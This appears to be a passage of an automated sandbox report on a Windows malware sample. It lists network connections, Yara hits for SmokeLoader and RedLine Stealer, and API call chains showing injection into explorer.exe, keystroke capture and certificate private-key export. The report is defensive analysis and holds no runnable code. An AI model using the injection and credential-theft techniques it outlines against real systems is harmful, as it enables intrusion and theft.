      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
      Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
      Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
      Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49882 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49890 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49898 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49902 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49913 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49919 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49925 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49931 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49941 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49948 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49954 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49960 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49966 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49972 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49978 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49994 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50007 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50013 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50063 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50065 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50067 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5292, type: MEMORYSTR
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F2162B GetKeyboardState,ToUnicode,19_2_02F2162B
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,10_2_00007FF7327A3220

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1799134235.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2045012210.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000006.00000002.2106729164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000008.00000002.2520412148.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000006.00000002.2106441385.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000007.00000002.2264170490.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000007.00000002.2263700057.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2045088261.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1799202066.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000007.00000002.2264057033.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000008.00000002.2520072402.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401514
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00402F97 RtlCreateUserThread,NtTerminateProcess,6_2_00402F97
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401542
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00403247 NtTerminateProcess,GetModuleHandleA,6_2_00403247
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401549
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_0040324F NtTerminateProcess,GetModuleHandleA,6_2_0040324F
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00403256 NtTerminateProcess,GetModuleHandleA,6_2_00403256
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401557
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_0040326C NtTerminateProcess,GetModuleHandleA,6_2_0040326C
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00403277 NtTerminateProcess,GetModuleHandleA,6_2_00403277
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_004032C7 CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,wcsstr,tolower,towlower,6_2_004032C7
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014FE
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00403290 NtTerminateProcess,GetModuleHandleA,6_2_00403290
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00403103 RtlCreateUserThread,NtTerminateProcess,7_2_00403103
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_004014FB LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014FB
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00401641 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401641
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00403257 RtlCreateUserThread,NtTerminateProcess,7_2_00403257
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00401606 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401606
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401613
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00401627 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401627
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015FB
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F4B92 RtlMoveMemory,NtUnmapViewOfSection,12_2_030F4B92
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F33C3 NtQueryInformationFile,12_2_030F33C3
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F342B NtQueryObject,NtQueryObject,RtlMoveMemory,12_2_030F342B
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,12_2_030F349B
      Source: C:\Windows\explorer.exeCode function: 13_2_003C38B0 NtUnmapViewOfSection,13_2_003C38B0
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00581016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,14_2_00581016
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00581819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,14_2_00581819
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00581A80 NtCreateSection,NtMapViewOfSection,14_2_00581A80
      Source: C:\Windows\explorer.exeCode function: 17_2_0082355C NtUnmapViewOfSection,17_2_0082355C
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,19_2_02F21016
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F218BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,19_2_02F218BF
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F21B26 NtCreateSection,NtMapViewOfSection,19_2_02F21B26
      Source: C:\Windows\explorer.exeCode function: 20_2_00EE370C NtUnmapViewOfSection,20_2_00EE370C
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A9AC810_2_00007FF7327A9AC8
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327ADC0C10_2_00007FF7327ADC0C
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327AA52010_2_00007FF7327AA520
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A213C10_2_00007FF7327A213C
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327AA77810_2_00007FF7327AA778
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A322010_2_00007FF7327A3220
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327AB42810_2_00007FF7327AB428
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F219812_2_030F2198
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0310B35C12_2_0310B35C
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030FC2F912_2_030FC2F9
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0314443812_2_03144438
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0310B97E12_2_0310B97E
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03115F0812_2_03115F08
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F6E6A12_2_030F6E6A
      Source: C:\Windows\explorer.exeCode function: 13_2_003C1E2013_2_003C1E20
      Source: C:\Windows\explorer.exeCode function: 17_2_0082205417_2_00822054
      Source: C:\Windows\explorer.exeCode function: 17_2_0082286017_2_00822860
      Source: C:\Windows\explorer.exeCode function: 20_2_00EE20F420_2_00EE20F4
      Source: C:\Windows\explorer.exeCode function: 20_2_00EE2A0420_2_00EE2A04
      Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 030F8801 appears 38 times
      Source: bCnarg2O62.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2045484809.0000000001FE1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
